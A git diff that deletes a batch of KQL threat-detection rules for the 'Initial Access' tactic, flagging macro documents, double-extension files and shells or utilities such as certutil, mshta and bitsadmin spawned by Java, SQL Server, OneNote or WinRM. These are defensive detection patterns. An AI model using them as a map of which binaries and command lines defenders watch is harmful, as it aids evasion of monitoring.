--- a/Initial Access/Office_Macro_File_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/23
-// Level: low
-// Description: Detects the creation of a new office macro files on the systems
-// Tags: attack.initial_access, attack.t1566.001
-DeviceFileEvents
-| where FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm"
\ No newline at end of file
diff --git a/Initial Access/Office_Macro_File_Creation_From_Suspicious_Process.kql b/Initial Access/Office_Macro_File_Creation_From_Suspicious_Process.kql
deleted file mode 100644
index e74caaca..00000000
--- a/Initial Access/Office_Macro_File_Creation_From_Suspicious_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/23
-// Level: high
-// Description: Detects the creation of a office macro file from a a suspicious process
-// Tags: attack.initial_access, attack.t1566.001
-DeviceFileEvents
-| where ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessParentFileName in~ ("cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "wscript.exe"))) and (FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm")
\ No newline at end of file
diff --git a/Initial Access/Office_Macro_File_Download.kql b/Initial Access/Office_Macro_File_Download.kql
deleted file mode 100644
index e589acbc..00000000
--- a/Initial Access/Office_Macro_File_Download.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/23
-// Level: medium
-// Description: Detects the creation of a new office macro files on the systems via an application (browser, mail client).
-// Tags: attack.initial_access, attack.t1566.001
-DeviceFileEvents
-| where ((FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm") or (FolderPath contains ".docm:Zone" or FolderPath contains ".dotm:Zone" or FolderPath contains ".xlsm:Zone" or FolderPath contains ".xltm:Zone" or FolderPath contains ".potm:Zone" or FolderPath contains ".pptm:Zone")) and (InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\thunderbird.exe" or InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe")
\ No newline at end of file
diff --git a/Initial Access/Password_Provided_In_Command_Line_Of_Net.EXE.kql b/Initial Access/Password_Provided_In_Command_Line_Of_Net.EXE.kql
deleted file mode 100644
index 5662813f..00000000
--- a/Initial Access/Password_Provided_In_Command_Line_Of_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Shelton (HAWK.IO)
-// Date: 2021/12/09
-// Level: medium
-// Description: Detects a when net.exe is called with a password in the command line
-// Tags: attack.defense_evasion, attack.initial_access, attack.persistence, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1078
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " "))
\ No newline at end of file
diff --git a/Initial Access/Phishing_Pattern_ISO_in_Archive.kql b/Initial Access/Phishing_Pattern_ISO_in_Archive.kql
deleted file mode 100644
index 12c62ad9..00000000
--- a/Initial Access/Phishing_Pattern_ISO_in_Archive.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/06/07
-// Level: high
-// Description: Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)
-// Tags: attack.initial_access, attack.t1566
-DeviceProcessEvents
-| where (FolderPath endswith "\\isoburn.exe" or FolderPath endswith "\\PowerISO.exe" or FolderPath endswith "\\ImgBurn.exe") and (InitiatingProcessFolderPath endswith "\\Winrar.exe" or InitiatingProcessFolderPath endswith "\\7zFM.exe" or InitiatingProcessFolderPath endswith "\\peazip.exe")
\ No newline at end of file
diff --git a/Initial Access/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql b/Initial Access/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql
deleted file mode 100644
index 3c74a001..00000000
--- a/Initial Access/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch (rule), Elastic (idea)
-// Date: 2022/10/21
-// Level: medium
-// Description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
-// Tags: attack.t1566, attack.t1566.001, attack.initial_access, attack.t1574, attack.t1574.001, attack.defense_evasion
-DeviceFileEvents
-| where ((InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.EXE" or InitiatingProcessFolderPath endswith "\\fltldr.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\Microsoft\\OneDrive\\" or FolderPath contains "\\Microsoft OneDrive\\" or FolderPath contains "\\Microsoft\\Teams\\" or FolderPath contains "\\Local\\slack\\app-" or FolderPath contains "\\Local\\Programs\\Microsoft VS Code\\") and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\") and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\" and FolderPath contains "\\Microsoft\\OneDrive\\" and FolderPath contains "\\api-ms-win-core-"))))
\ No newline at end of file
diff --git a/Initial Access/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql b/Initial Access/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql
deleted file mode 100644
index 23d22f38..00000000
--- a/Initial Access/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/02/08
-// Level: medium
-// Description: Detects the execution of an AnyDesk binary with a version prior to 8.0.8.
-Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors.
-Use this rule to detect instances of older versions of Anydesk using the compromised certificate
-This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.
-
-// Tags: attack.execution, attack.initial_access
-DeviceProcessEvents
-| where ((FolderPath endswith "\\AnyDesk.exe" or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH") and (ProcessVersionInfoProductVersion startswith "7.0." or ProcessVersionInfoProductVersion startswith "7.1." or ProcessVersionInfoProductVersion startswith "8.0.1" or ProcessVersionInfoProductVersion startswith "8.0.2" or ProcessVersionInfoProductVersion startswith "8.0.3" or ProcessVersionInfoProductVersion startswith "8.0.4" or ProcessVersionInfoProductVersion startswith "8.0.5" or ProcessVersionInfoProductVersion startswith "8.0.6" or ProcessVersionInfoProductVersion startswith "8.0.7")) and (not((ProcessCommandLine contains " --remove" or ProcessCommandLine contains " --uninstall")))
\ No newline at end of file
diff --git a/Initial Access/Remote_Access_Tool_-_ScreenConnect_Installation_Execution.kql b/Initial Access/Remote_Access_Tool_-_ScreenConnect_Installation_Execution.kql
deleted file mode 100644
index e2ed740c..00000000
--- a/Initial Access/Remote_Access_Tool_-_ScreenConnect_Installation_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/02/11
-// Level: medium
-// Description: Detects ScreenConnect program starts that establish a remote access to a system.
-// Tags: attack.initial_access, attack.t1133
-DeviceProcessEvents
-| where ProcessCommandLine contains "e=Access&" and ProcessCommandLine contains "y=Guest&" and ProcessCommandLine contains "&p=" and ProcessCommandLine contains "&c=" and ProcessCommandLine contains "&k="
\ No newline at end of file
diff --git a/Initial Access/Remote_Access_Tool_-_ScreenConnect_Server_Web_Shell_Execution.kql b/Initial Access/Remote_Access_Tool_-_ScreenConnect_Server_Web_Shell_Execution.kql
deleted file mode 100644
index e7f24392..00000000
--- a/Initial Access/Remote_Access_Tool_-_ScreenConnect_Server_Web_Shell_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jason Rathbun (Blackpoint Cyber)
-// Date: 2024/02/26
-// Level: high
-// Description: Detects potential web shell execution from the ScreenConnect server process.
-// Tags: attack.initial_access, attack.t1190
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe") and InitiatingProcessFolderPath endswith "\\ScreenConnect.Service.exe"
\ No newline at end of file
diff --git a/Initial Access/Remote_Access_Tool_-_Team_Viewer_Session_Started_On_Windows_Host.kql b/Initial Access/Remote_Access_Tool_-_Team_Viewer_Session_Started_On_Windows_Host.kql
deleted file mode 100644
index 700bc666..00000000
--- a/Initial Access/Remote_Access_Tool_-_Team_Viewer_Session_Started_On_Windows_Host.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Josh Nickels, Qi Nan
-// Date: 2024/03/11
-// Level: low
-// Description: Detects the command line executed when TeamViewer starts a session started by a remote host.
-Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
-
-// Tags: attack.initial_access, attack.t1133
-DeviceProcessEvents
-| where ProcessCommandLine endswith "TeamViewer_Desktop.exe --IPCport 5939 --Module 1" and FolderPath =~ "TeamViewer_Desktop.exe" and InitiatingProcessFolderPath =~ "TeamViewer_Service.exe"
\ No newline at end of file
diff --git a/Initial Access/Shell_Process_Spawned_by_Java.EXE.kql b/Initial Access/Shell_Process_Spawned_by_Java.EXE.kql
deleted file mode 100644
index 534b99c8..00000000
--- a/Initial Access/Shell_Process_Spawned_by_Java.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali
-// Date: 2021/12/17
-// Level: medium
-// Description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\java.exe") and (not((ProcessCommandLine contains "build" and InitiatingProcessFolderPath contains "build")))
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Child_Process_Of_SQL_Server.kql b/Initial Access/Suspicious_Child_Process_Of_SQL_Server.kql
deleted file mode 100644
index b669d6d5..00000000
--- a/Initial Access/Suspicious_Child_Process_Of_SQL_Server.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye Team, wagga
-// Date: 2020/12/11
-// Level: high
-// Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
-// Tags: attack.t1505.003, attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (not((ProcessCommandLine startswith "\"C:\\Windows\\system32\\cmd.exe\" " and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath endswith "DATEV_DBENGINE\\MSSQL\\Binn\\sqlservr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\")))
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Child_Process_Of_Veeam_Dabatase.kql b/Initial Access/Suspicious_Child_Process_Of_Veeam_Dabatase.kql
deleted file mode 100644
index b9990b32..00000000
--- a/Initial Access/Suspicious_Child_Process_Of_Veeam_Dabatase.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/04
-// Level: critical
-// Description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine contains "VEEAMSQL" and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (((ProcessCommandLine contains "-ex " or ProcessCommandLine contains "bypass" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "copy ") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wt.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\whoami.exe"))
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Double_Extension_File_Execution.kql b/Initial Access/Suspicious_Double_Extension_File_Execution.kql
deleted file mode 100644
index 61a0e484..00000000
--- a/Initial Access/Suspicious_Double_Extension_File_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/06/26
-// Level: critical
-// Description: Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns
-// Tags: attack.initial_access, attack.t1566.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".doc.exe" or ProcessCommandLine contains ".docx.exe" or ProcessCommandLine contains ".xls.exe" or ProcessCommandLine contains ".xlsx.exe" or ProcessCommandLine contains ".ppt.exe" or ProcessCommandLine contains ".pptx.exe" or ProcessCommandLine contains ".rtf.exe" or ProcessCommandLine contains ".pdf.exe" or ProcessCommandLine contains ".txt.exe" or ProcessCommandLine contains " .exe" or ProcessCommandLine contains "______.exe" or ProcessCommandLine contains ".doc.js" or ProcessCommandLine contains ".docx.js" or ProcessCommandLine contains ".xls.js" or ProcessCommandLine contains ".xlsx.js" or ProcessCommandLine contains ".ppt.js" or ProcessCommandLine contains ".pptx.js" or ProcessCommandLine contains ".rtf.js" or ProcessCommandLine contains ".pdf.js" or ProcessCommandLine contains ".txt.js") and (FolderPath endswith ".doc.exe" or FolderPath endswith ".docx.exe" or FolderPath endswith ".xls.exe" or FolderPath endswith ".xlsx.exe" or FolderPath endswith ".ppt.exe" or FolderPath endswith ".pptx.exe" or FolderPath endswith ".rtf.exe" or FolderPath endswith ".pdf.exe" or FolderPath endswith ".txt.exe" or FolderPath endswith " .exe" or FolderPath endswith "______.exe" or FolderPath endswith ".doc.js" or FolderPath endswith ".docx.js" or FolderPath endswith ".xls.js" or FolderPath endswith ".xlsx.js" or FolderPath endswith ".ppt.js" or FolderPath endswith ".pptx.js" or FolderPath endswith ".rtf.js" or FolderPath endswith ".pdf.js" or FolderPath endswith ".txt.js")
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Execution_From_Outlook_Temporary_Folder.kql b/Initial Access/Suspicious_Execution_From_Outlook_Temporary_Folder.kql
deleted file mode 100644
index 2b34c9c1..00000000
--- a/Initial Access/Suspicious_Execution_From_Outlook_Temporary_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/01
-// Level: high
-// Description: Detects a suspicious program execution in Outlook temp folder
-// Tags: attack.initial_access, attack.t1566.001
-DeviceProcessEvents
-| where FolderPath contains "\\Temporary Internet Files\\Content.Outlook\\"
\ No newline at end of file
diff --git a/Initial Access/Suspicious_File_Drop_by_Exchange.kql b/Initial Access/Suspicious_File_Drop_by_Exchange.kql
deleted file mode 100644
index 6f40640f..00000000
--- a/Initial Access/Suspicious_File_Drop_by_Exchange.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/10/04
-// Level: medium
-// Description: Detects suspicious file type dropped by an Exchange component in IIS
-// Tags: attack.persistence, attack.t1190, attack.initial_access, attack.t1505.003
-DeviceFileEvents
-| where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe") and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx" or FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".vbs")
\ No newline at end of file
diff --git a/Initial Access/Suspicious_HH.EXE_Execution.kql b/Initial Access/Suspicious_HH.EXE_Execution.kql
deleted file mode 100644
index cd21df94..00000000
--- a/Initial Access/Suspicious_HH.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxim Pavlunin
-// Date: 2020/04/01
-// Level: high
-// Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
-// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") and (ProcessCommandLine contains ".application" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Content.Outlook\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/Initial Access/Suspicious_HWP_Sub_Processes.kql b/Initial Access/Suspicious_HWP_Sub_Processes.kql
deleted file mode 100644
index 7c00588f..00000000
--- a/Initial Access/Suspicious_HWP_Sub_Processes.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/24
-// Level: high
-// Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
-// Tags: attack.initial_access, attack.t1566.001, attack.execution, attack.t1203, attack.t1059.003, attack.g0032
-DeviceProcessEvents
-| where FolderPath endswith "\\gbb.exe" and InitiatingProcessFolderPath endswith "\\Hwp.exe"
\ No newline at end of file
diff --git a/Initial Access/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql b/Initial Access/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql
deleted file mode 100644
index 039ecce5..00000000
--- a/Initial Access/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
-// Tags: attack.initial_access, attack.t1190, attack.persistence, attack.t1505.003
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\MSExchangeMailboxReplication.exe" and (FolderPath endswith ".aspx" or FolderPath endswith ".asp")
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Microsoft_OneNote_Child_Process.kql b/Initial Access/Suspicious_Microsoft_OneNote_Child_Process.kql
deleted file mode 100644
index cf718847..00000000
--- a/Initial Access/Suspicious_Microsoft_OneNote_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@ -// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea) -// Date: 2022/10/21 -// Level: high -// Description: Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file. -// Tags: attack.t1566, attack.t1566.001, attack.initial_access -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\onenote.exe" and (((ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".pif" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd") and FolderPath endswith "\\explorer.exe") or ((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith 
"\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\")) and (not(((ProcessCommandLine endswith "-Embedding" and FolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and FolderPath endswith "\\FileCoAuth.exe") or (ProcessCommandLine endswith "-Embedding" and FolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe")))) \ No newline at end of file diff --git a/Initial Access/Suspicious_Processes_Spawned_by_Java.EXE.kql b/Initial Access/Suspicious_Processes_Spawned_by_Java.EXE.kql deleted file mode 100644 index 7ac4d66c..00000000 --- a/Initial Access/Suspicious_Processes_Spawned_by_Java.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Florian Roth
-// Date: 2021/12/17
-// Level: high
-// Description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\java.exe"
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Processes_Spawned_by_WinRM.kql b/Initial Access/Suspicious_Processes_Spawned_by_WinRM.kql
deleted file mode 100644
index 156ae6e7..00000000
--- a/Initial Access/Suspicious_Processes_Spawned_by_WinRM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Markus Neis
-// Date: 2021/05/20
-// Level: high
-// Description: Detects suspicious processes including shells spawnd from WinRM host process
-// Tags: attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe") and InitiatingProcessFolderPath endswith "\\wsmprovhost.exe"
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql b/Initial Access/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql
deleted file mode 100644
index a6b5d758..00000000
--- a/Initial Access/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/12/22
-// Level: high
-// Description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "\\keytool.exe"
\ No newline at end of file
